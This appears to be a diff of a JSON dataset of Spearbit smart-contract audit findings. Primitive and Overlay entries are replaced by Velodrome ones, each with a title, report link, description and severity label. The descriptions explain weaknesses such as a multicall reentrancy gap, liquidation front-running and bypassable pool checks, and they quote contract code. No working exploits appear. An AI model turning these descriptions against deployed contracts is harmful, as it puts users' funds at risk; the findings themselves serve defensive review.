"title": "Redundant variable update", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In notifyRewardAmount the variable lastUpdateTime is updated twice", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Bisection always uses max iterations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The current bisection algorithm chooses the mid point as root = (lower + upper) / 2; and the bisection terminates if either upper - lower < 0 or maxIterations is reached. Given upper >= lower throughout the code, it's easy to see that upper - lower < 0 can never be satisfied. The bisection will always use the max iterations. However, even with an epsilon of 1 it can happen that the mid point root is the same as the lower bound if upper = lower + 1. The if (output * lowerOutput < 0) condition will never be satisfied and the else case will always run, setting the lower bound to itself. The bisection will keep iterating with the same lower and upper bounds until max iterations are reached.", + "title": "Turn logic into internal function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In Gauge contract the logic to update rewardPerTokenStored,lastUpdateTime,rewards,userRewardsPerTokenPaid can be converted to internal function for simplicity", "labels": [ "Spearbit", - "Primitive", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Potential reentrancy in claimFees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The contract performs all transfers in the _settlement function and therefore _settlement can call- back to the user for reentrant tokens. To avoid reentrancy issues the _preLock() modifier implements a reentrancy check, but only if the called action is not happening during a multicall execution: function _preLock() private { // Reverts if the lock was already set and the current call is not a multicall. if (_locked != 1 && !_currentMulticall) { revert InvalidReentrancy(); } _locked = 2; } Therefore, multicalls are not protected against reentrancy and _settlement should never be executed, only once at the end of the original multicall function. However, the claimFee function can be called through a multicall by the protocol owner and it calls _settlement even if the execution is part of a multicall.", + "title": "Add extra slippages on client-side when dependent paths are used in generateZapInParams", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "generateZapInParams is a helper function in Router that calculates the parameters for zapIn. there's a duplicate pair in RoutesA and RoutesB, the value calculated here would be off. For example, The optimal path to swap dai into usdc/velo pair would likely have dai/eth in both routesA and routesB. When the user uses this param to call zapIn, it executes two swaps: dai -> eth -> usdc, and dai -> eth -> velo. As the price of dai/eth is changed after the first swap, the second swap would have a slightly bad price. The zapIn will likely revert as it does not meet the min token return. If", "labels": [ "Spearbit", - "Primitive", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Bisection can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The Bisection algorithm tries to find a root of the monotonic function. Evaluating the expensive invariant function at the lower point on each iteration can be avoided by caching the output function value whenever a new lower bound is set.", + "title": "Unnecessary skim in router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The pair contract absorbs any extra tokens after swap, mint, and burn. Triggering Skim after burn/mint would not return extra tokens.", "labels": [ "Spearbit", - "Primitive", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Pool existence check in swap should happen earlier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The swap function makes use of the pool pair's tokens to scale the input decimals before it checks if the pool even exists.", + "title": "Overflow is not desired and can lead to loss of funds in Solidity 8.0.0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In solidity 8.0, overflow of uint is defaulted to be reverted. //Pair.sol#L235-L239 uint256 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) { reserve0CumulativeLast += _reserve0 * timeElapsed; reserve1CumulativeLast += _reserve1 * timeElapsed; } reserve0CumulativeLast += _reserve0 * timeElapsed; This calculation will overflow and DOS the pair if _- reserve0 is too large. As a result, the pool should not support high decimals tokens.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Pool creation in test uses wrong duration and volatility", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The second path with pairId != 0 in HelperConfigsLib's pool creation calls the createPool method with the volatility and duration parameters swapped, leading to wrong pool creations used in tests that use this path.", + "title": "Unnecessary casting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "_totalWeight is already declared as uint256", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Use unchecked in TickMath.sol and FullMath.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Uniswap math libraries rely on wrapping behaviour for conducting arithmetic operations. Solidity version 0.8.0 introduced checked arithmetic by default where operations that cause an overflow would revert. Since the code was adapted from Uniswap and written in Solidity version 0.7.6, these arithmetic operations should be wrapped in an unchecked block.", + "title": "Refactor retrieve current epoch into library", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Could refactor to a library function to retrieve the current epoch", "labels": [ "Spearbit", - "Overlay", - "Severity: High Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Liquidation might fail", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The liquidate() function checks if a position can be liquidated and via liquidatable(), uses maintenanceMarginFraction as a factor to determine if enough value is left. However, in the rest of the liqui- date() function liquidationFeeRate is used to determine the fee paid to the liquidator. It is not necessarily true that enough value is left for the fee, as two different ways are used to calculate this which means that positions might be liquidated. This is classified as high risk because liquidation is an essential functionality of Overlay. contract OverlayV1Market is IOverlayV1Market { function liquidate(address owner, uint256 positionId) external { ... require(pos.liquidatable(..., maintenanceMarginFraction),\"OVLV1:!liquidatable\"); ... uint256 liquidationFee = value.mulDown(liquidationFeeRate); ... ovl.transfer(msg.sender, value - liquidationFee); ovl.transfer(IOverlayV1Factory(factory).feeRecipient(), liquidationFee); } } library Position { function liquidatable(..., uint256 maintenanceMarginFraction) ... { ... uint256 maintenanceMargin = posNotionalInitial.mulUp(maintenanceMarginFraction); can_ = val < maintenanceMargin; } } 4", + "title": "Add governor permission to sensible functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Some functions that change important variables could add governor permission to enable changes. The function setManagedState in VotingEscrow is one that is recommended to add governor permission.", "labels": [ "Spearbit", - "Overlay", - "Severity: High Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Rounding down of snapAccumulator might influence calculations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function transform() lowers snapAccumulator with the following equation: (snapAccumulator * int256(dt)) / int256(snapWindow). During the time that snapAccumulator * dt is smaller than snapWindow this will be rounded down to 0, which means snapAccumulator will stay at the same value. Luckily, dt will eventually reach the value of snapWindow and by then the value wont be rounded down to 0 any more. Risk lies in calculations diverging from formulas written in the whitepaper. Note: Given medium risk severity because the probability of this happening is high, while impact is likely low. function transform(...) ... { ... snapAccumulator -= (snapAccumulator * int256(dt)) / int256(snapWindow); ... }", + "title": "Admin privilege through proposal threshold", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "As an Admin Privilege of the Team, the variable proposalNumerator could change causing the proposalThreshold to be higher than expected. The Team could front-run calls to propose and increase the numerator, this could block proposals", "labels": [ "Spearbit", - "Overlay", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Verify pool legitimacy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The constructor in OverlayV1UniswapV3Factory.sol and OverlayV1UniswapV3Feed.sol only does a partial check to see if the pool corresponds to the supplied tokens. This is accomplished by calling the pools functions but if the pool were to be malicious, it could return any token. Additionally, checks can be by- passed by supplying the same tokens twice. Because the deployFeed() function is permissionless, it is possible to deploy malicious feeds. Luckily, the de- ployMarket() function is permissioned and prevents malicious markets from being deployed. contract OverlayV1UniswapV3Factory is IOverlayV1UniswapV3FeedFactory, OverlayV1FeedFactory { constructor(address _ovlWethPool, address _ovl, ...) { ovlWethPool = _ovlWethPool; // no check on validity of _ovlWethPool here ovl = _ovl; } function deployFeed(address marketPool, address marketBaseToken, address marketQuoteToken, ...) external returns (address feed_) { // Permissionless ... // no check on validity of marketPool here } 5 } contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { constructor( address _marketPool, address _ovlWethPool, address _ovl, address _marketBaseToken, address _marketQuoteToken, ... ) ... { ... address _marketToken0 = IUniswapV3Pool(_marketPool).token0(); // relies on a valid _marketPool address _marketToken1 = IUniswapV3Pool(_marketPool).token1(); require(_marketToken0 == WETH || _marketToken1 == WETH, \"OVLV1Feed: marketToken != WETH\"); marketToken0 = _marketToken0; marketToken1 = _marketToken1; require( _marketToken0 == _marketBaseToken || _marketToken1 == _marketBaseToken, \"OVLV1Feed: marketToken != marketBaseToken\" ); require( _marketToken0 == _marketQuoteToken || _marketToken1 == _marketQuoteToken, \"OVLV1Feed: marketToken != marketQuoteToken\" ); marketBaseToken = _marketBaseToken; // what if _marketBaseToken == _marketQuoteToken == WETH ? marketQuoteToken = _marketQuoteToken; marketBaseAmount = _marketBaseAmount; // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); // relies on a valid ,! _ovlWethPool address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); require( _ovlWethToken0 == WETH || _ovlWethToken1 == WETH, \"OVLV1Feed: ovlWethToken != WETH\" ); require( _ovlWethToken0 == _ovl || _ovlWethToken1 == _ovl, // What if _ovl == WETH ? \"OVLV1Feed: ovlWethToken != OVL\" ); ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; marketPool = _marketPool; ovlWethPool = _ovlWethPool; ovl = _ovl; }", + "title": "Simplify check for rounding error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The check of rounding error can be simplified. Instead using A / B > 0 use A > B", "labels": [ "Spearbit", - "Overlay", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Liquidatable positions can be unwound by the owner of the position", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The liquidation function can be front-runned since it does not require any deposits. In particular, the liquidation function can be front-runned by the owner of the position by calling unwind. This effectively means that users can prevent themselves from getting liquidated by watching the mempool and frontrunning calls to their liquidation position by calling unwind. Although this behaviour is similar to liquidations in lending protocols where a borrower can front-run a liquidation by repaying the borrow, the lack of collateral requirements for both unwind and liquidation makes this case special. Note: In practice, transactions for liquidations do not end up in the public mempool and are often sent via private relays such as flashbots. Therefore, a scenario where the user finds out about a liquidatable position by the public mempool is likely not common. However, a similar argument still applies. Note: Overlay also allows the owner of the position to be the liquidator, unlike other protocols like compound. The difference in price computation for the liquidation and unwind mechanism may make it better for users to liquidate themselves rather than unwinding their position. However, a check similar to compound is not effective at preventing this issue since users can always liquidate themselves from another address.", + "title": "Storage declarations in the middle of the file", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "If you wish to keep the logic separate, consider creating a separate abstract contract.", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Adding constructor params causes creation code to change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Using constructor parameters in create2 makes the construction code different for every case. This makes address calculation more complex as you first have to calculate the construction code, hash it and then do address calculation. Whats worse is that Etherscan does not properly support auto-verification of contracts deployed via create2 with different creation code. Youll have to manually verify all markets individually. Additionally, needless salt in OverlayV1Factory.sol#L129.", + "title": "Inconsistent usage of _msgSender()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "There are some instances where msg.sender is used in contrast with _msgSender() function.", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational Voter.sol#L75-L78," ] }, { - "title": "Potential wrap of timestamp", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "In the transform() function, a revert could occur right after timestamp32 has wrapped (e.g. when timestamp > 2**32). function transform(... , uint256 timestamp, ...) ... { uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32 ... uint256 dt = uint256(timestamp32 - self.timestamp); // could revert if timestamp32 has just wrapped ... }", + "title": "Change emergency council should be enabled to Governor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Governor may also want to be able to set and change the emergency council, this avoids the potential risk of the council abusing their power", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Verify the validity of _microWindow and _macroWindow", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The constructor of OverlayV1Feed doesnt verify the validity of _microWindow and _macroWindow, potentially causing the price oracle to produce bad results if misconfigured. constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; }", + "title": "Unnecessary inheritance in Velo contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Velo isn't used for governance, therefore it's not necessary to inherit from ERC20Votes.", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Simplify _midFromFeed()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The calculation in _midFromFeed() is more complicated than necessary because: min(x,y) + max(x,y) == x + y. More importantly, the average operation (bid + ask) / 2 can overflow and revert if bid + ask >= 2**256. function _midFromFeed(Oracle.Data memory data) private view returns (uint256 mid_) { uint256 bid = Math.min(data.priceOverMicroWindow, data.priceOverMacroWindow); uint256 ask = Math.max(data.priceOverMicroWindow, data.priceOverMacroWindow); mid_ = (bid + ask) / 2; }", + "title": "Incorrect value in Mint event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In Minter#update_period the Mint event is emitted with incorrect values.", "labels": [ "Spearbit", - "Overlay", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Use implicit truncation of timestamp", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Solidity will truncate data when it is typecast to a smaller data type, see solidity explicit-conversions. This can be used to simplify the following statement: uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32", + "title": "Do not cache constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It is not necessary to cache constant variable.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Set pos.entryPrice to 0 after liquidation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The liquidate() function sets most of the values of pos to 0, with the exception of pos.entryPrice. function liquidate(address owner, uint256 positionId) external { ... // store the updated position info data. mark as liquidated pos.notional = 0; pos.debt = 0; pos.oiShares = 0; pos.liquidated = true; positions.set(owner, positionId, pos); ... }", + "title": "First week will have no emissions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Cannot call update_period on the first week due to setting the current period to this one. Emissions will start at most one week after", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Store result of expression in temporary variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Several gas optimizations are possible by storing the result of an expression in a temporary variable, such as the value of oiFromNotional(data, capNotionalAdjusted). 10 function build( ... ) { ... uint256 price = isLong ? ask(data, _registerVolumeAsk(data, oi, oiFromNotional(data, capNotionalAdjusted))) : bid(data, _registerVolumeBid(data, oi, oiFromNotional(data, capNotionalAdjusted))); ... require(oiTotalOnSide <= oiFromNotional(data, capNotionalAdjusted), \"OVLV1:oi>cap\"); } A: The value of pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) could be stored in a temporary variable to save gas. B: The value of oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) could also be stored in a temporary variable to save gas and make the code more readable. C: The value of pos.oiSharesCurrent(fraction) could be stored in a temporary variable to save gas. function unwind(...) ... { ... uint256 price = pos.isLong ? bid( data, _registerVolumeBid( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A1 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B1 ) ) : ask( data, _registerVolumeAsk( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A2 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B2 ) ); ... if (pos.isLong) { oiLong -= Math.min( oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A3 ); oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); // C1 } else { oiShort -= Math.min( oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A4 ); oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); // C2 } ... pos.oiShares -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); // C3 } The value of 2 * k * timeElapsed could also be stored in a temporary variable: 11 function oiAfterFunding( ...) ... { ... if (2 * k * timeElapsed < MAX_NATURAL_EXPONENT) { fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); }", + "title": "Variables can be renamed for better clarity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "For a better understanding, some variables could be renamed.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Flatten code of OverlayV1UniswapV3Feed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Functions _fetch(), _inputsToConsultMarketPool(), _inputsToConsultOvlWethPool() and con- sult() do a lot of interactions with small arrays and loops over them, increasing overhead and reading difficulty.", + "title": "Minter week will eventually shift", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The constant WEEK is used as the duration of an epoch that resets every Thursday, after 4 years (4 * 365.25 days) the day of the week will eventually shift, not following the Thursday cadence.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Replace memory with calldata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "External calls to functions with memory parameters can be made more gas efficient by replacing memory with calldata, as long as the memory parameters are not modified.", + "title": "Ownership change will break certain yield farming automations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Due to the check, any transfer done in the same block as the call to depositManaged will revert. While a sidestep for the mechanic for malicious users was shown, the check will prevent a common use case in Yield Farming: Zapping. Because of the check, an end user will not be able to zap from their VELO to VE to the Managed Position, which may create a sub-par experience for end users. This should also create worse UX for Yield Farming Projects as they will have to separate the transfer from the deposit which will cost them more gas and may make their product less capital efficient", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "No need to cache immutable values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Variables microWindow and macroWindow are immutable, so it is not necessary to cache them because the compiler inlines their value. contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { function _fetch() internal view virtual override returns (Oracle.Data memory) { // cache micro and macro windows for gas savings uint256 _microWindow = microWindow; uint256 _macroWindow = macroWindow; ... } } abstract contract OverlayV1Feed is IOverlayV1Feed { ... uint256 public immutable microWindow; uint256 public immutable macroWindow; ... constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; } }", + "title": "Quantitative analysis of Minter logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It will take 110 iterations to go from 15 MLN to the Tail Emission Threshold Minter.sol#L32-L37 /// @notice When emissions fall below this amount, begin tail emissions uint256 public constant TAIL_START = 5_000_000 * 1e18; /// @notice Tail emissions rate in basis points uint256 public tailEmissionRate = 30; /// @notice Starting weekly emission of 15M VELO (VELO has 18 decimals) uint256 public weekly = 15_000_000 * 1e18; ## Python allows decimal Math, wlog, just take mantissa INITIAL = 15 * 10 ** 6 TAIL = 5 * 10 ** 6 MULTIPLIER_BPS = 99_00 MAX_BPS = 10_000 value = INITIAL i = 0 min_emitted = 0 while (value > TAIL): i+= 1 min_emitted += value value = value * MULTIPLIER_BPS / MAX_BPS i 110 value 4965496.324815211 min_emitted 1003450367.5184793 ## If nobody ever bridged, this would be emissions at tail min_emitted * 30 / 10_000 3010351.1025554384 Tail emissions are most likely going to be a discrete step down in emissions >>> min_emitted 1003450367.5184793 V1_CIRC = 150 * 10 ** 6 ranges = range(V1_CIRC // 10, V1_CIRC, V1_CIRC // 10) for val in ranges: print((min_emitted + val) * 30 / 10_000) 3055351.1025554384 3100351.1025554384 3145351.1025554384 3190351.1025554384 3235351.1025554384 3280351.1025554384 3325351.1025554384 3370351.1025554384 3415351.1025554384 The last value before the tail will be most likely around 1 Million fewer tokens minted per period. Maximum Mintable Value is slightly above Tail, with Absolute Max being way above Tail 57 ## Max Supply >>> 1000 * 10 ** 6 1000000000 >>> min_emitted = 1003450367.5184793 >>> max_circ = 1000 * 10 ** 6 + min_emitted >>> max_mint = max_circ * 30 / 10_000 ## If we assume min_emitted + 1 Billion Velo V1 Sinked >>> max_mint 6010351.102555438 ## If we assume nudge to 100 BPS >>> abs_max_mint = max_circ * 100 / 10_000 >>> abs_max_mint 20034503.675184794", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Simplify circuitBreaker", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function circuitBreaker() does a divDown() which can be circumvented to save gas and improving readability. function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) ... { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (uint256(minted).divDown(_circuitBreakerMintTarget) >= 2 * ONE) { return 0; } ... }", + "title": "Optimism's block production may change in the future", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "block number, because of OP potentially changing block frequency in the future, given Bedrocks update to block.timestamp, it may be desirable to refactor back to the OZ implementation. And VeloGorvernor assumes 2 blocks every second. In OP's docs says block.number is not a reliable timing reference: community.optimism.io/docs/developers/build/differences/#block- numbers-and-timestamps It's also dangerous to use block.number at the time cause it will probably mean a different thing in pre- and post- bedrock upgrades.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Optimizations if data.macroWindow is constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Several checks are done in contract OverlayV1Market which involve data.macroWindow in combi- nation with a linear calculation. If data.macroWindow does not change (as is the case with the UniswapV3 feed), it is possible to optimize the calculations by precalculating several values.", + "title": "Remove unnecessary check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "These checks are unnecessary because it already checks if targets and calldata lengths are equal to 1.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Remove unused / redundant functions and variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Functions nextPositionId() and mid() in OverlayV1Market.sol are not used internally and dont appear to be useful. contract OverlayV1Market is IOverlayV1Market { function nextPositionId() external view returns (uint256) { return _totalPositions; } function mid(Oracle.Data memory data,uint256 volumeBid,uint256 volumeAsk) ... { ... } } The functions oiInitial() and oiSharesCurrent() in library Position.sol have the same implementation. The oiInitial() function does not seem useful as it retrieves current positions and not initial ones. library Position { /// @notice Computes the initial open interest of position when built ... function oiInitial(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } /// @notice Computes the current shares of open interest position holds ... function oiSharesCurrent(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } } 15 The function liquidationPrice() in library Position.sol is not used from the contracts. Because it type is internal it cannot be called from the outside either. library Position { function liquidationPrice(... ) internal pure returns (uint256 liqPrice_) { ... } } The variables ovlWethToken0 and ovlWethToken1 are stored but not used anymore. constructor(..., address _ovlWethPool,...) .. { ... // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); ... ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; ... }", + "title": "Event is missing indexed fields", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Index event fields make the field more quickly accessible to off-chain tools that parse events. How- ever, note that each index field costs extra gas during emission, so it's not necessarily best to index the maximum allowed per event (three fields). Each event should use three indexed fields if there are three or more fields, and gas usage is not particularly of concern for the events in question. If there are fewer than three fields, all of the fields should be indexed.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization OverlayV1Market.sol#L536-L539," + "Velodrome", + "Severity: Informational" ] }, { - "title": "Optimize power functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "In contract OverlayV1Market.sol, several power calculations are done with EULER / INVERSE_EULER as a base which can be optimized to save gas. function dataIsValid(Oracle.Data memory data) public view returns (bool) { ... uint256 dpLowerLimit = INVERSE_EULER.powUp(pow); uint256 dpUpperLimit = EULER.powUp(pow); ... } Note: As the Overlay team confirmed, less precision might be sufficient for this calculation. OverlayV1Market.sol: fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); OverlayV1Market.sol: bid_ = bid_.mulDown(INVERSE_EULER.powUp(pow)); OverlayV1Market.sol: ask_ = ask_.mulUp(EULER.powUp(pow)); 16", + "title": "Missing checks for address(0) when assigning values to address state variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Lack of zero-address validation on address parameters may lead to transaction reverts, waste gas, require resubmission of transactions and may even force contract redeployments in certain cases within the proto- col.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational FactoryRegistry.sol#L26-L28, RewardsDistributor.sol#L308," ] }, { - "title": "Redundant Math.min()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function capNotionalAdjustedForCircuitBreaker() calculates circuitBreaker() and then does a Math.min(cap,...) with the result. However circuitBreaker() already returns a value that is <= cap. So the Math.min(...) function is unnecesary. 17 function capNotionalAdjustedForCircuitBreaker(uint256 cap) public view returns (uint256) { ... cap = Math.min(cap, circuitBreaker(snapshot, cap)); return cap; } function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) public view returns (uint256) { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (...) { return 0; } // so minted > _circuitBreakerMintTarget, thus minted / _circuitBreakerMintTarget > ONE ... uint256 adjustment = 2 * ONE - uint256(minted).divDown(_circuitBreakerMintTarget); // so adjustment <= ONE return cap.mulDown(adjustment); // so this is <= cap }", + "title": "Incorrect comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "There are a few mistakes in the comments that can be corrected in the codebase.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Replace square with multiplication", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The contract OverlayV1Market.sol contains the following expression several times: x.powDown(2 * ONE). This computes the square of x. However, it can also be calculated in a more gas efficient way: function oiAfterFunding(...) { ... uint256 underRoot = ONE - oiImbalanceBefore.divDown(oiTotalBefore).powDown(2 * ONE).mulDown( 